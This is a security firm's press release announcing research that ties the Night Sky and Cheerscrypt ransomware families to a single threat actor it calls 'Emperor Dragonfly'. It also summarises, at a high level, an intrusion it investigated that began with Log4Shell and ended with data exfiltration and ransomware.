In a new report, Sygnia’s Incident Response (IR) team connects Night Sky and Cheerscrypt activity to one unified threat group targeting Windows and VMWare ESXi environments
Sygnia, a leading incident response and cyber security consulting company that protects organizations worldwide, today released a new report uncovering that attacks led by the Night Sky and Cheerscrypt ransomware groups originated from the same threat actor, dubbed ‘Emperor Dragonfly’ by the company. This significant discovery reaffirms newer methodologies being implemented by industry threat actors to appear as several, smaller groups in order to avoid discovery.
While investigating an incident involving the largely unknown ransomware group, Cheerscrypt, Sygnia’s IR team detected that the Tactics, Techniques and Procedures (TTPs) that were being used strongly resembled those of another known ransomware group, Night Sky. The fact that Night Sky indicators of compromise (IOC) were identified, but Cheerscrypt ransomware was deployed, prompted Sygnia’s IR team to delve deeper into Cheerscrypt’s origins. As a result, Sygnia has become the first to identify that Cheerscrypt, like Night Sky, is another ransomware family developed by Emperor Dragonfly.
In January 2022, threat actors compromised a VMware Horizon server by leveraging the Log4Shell vulnerability. From here, the threat actors increased their foothold within the network and moved laterally by executing code remotely and deploying Cobalt Strike Beacons. After a dwell time of several months, the threat actors used the Rclone open-source command-line tool to exfiltrate sensitive information to the cloud storage service and deliver the final payload: Cheerscrypt ransomware. Although most publications describe Cheerscrypt as a Linux-based ransomware family that targets ESXi servers, in the case Sygnia investigated, both Windows and ESXi machines were encrypted.
Unlike other ransomware groups, Emperor Dragonfly, also known as DEV-0401/ BRONZESTARLIGHT, does not operate in an affiliate model and refrains from purchasing initial access from other threat actors. Rather, the group manages all stages of the attack lifecycle on their own. The group also rebrands their ransomware payloads every few months, which helps them stay under the radar, unlike other notorious groups which act to build up their reputations. And despite Cheerscrypt presenting themselves as pro-Ukrainian, during the incident the threat actors deployed open-source tools that were written by Chinese developers for Chinese users, reinforcing previous claims that the Emperor Dragonfly operators are based in China.
“In the world of ransomware affiliates and leaked ransomware source code, it is often difficult to connect two ransomware strains with one threat actor,” said Amnon Kushnir, Incident Response and Threat Hunting Team Leader at Sygnia. “This discovery is crucial in helping our clients to better search their networks for traces of the threat group in a rapidly-changing landscape, as well as better defend their systems against Emperor Dragonfly and similar threats.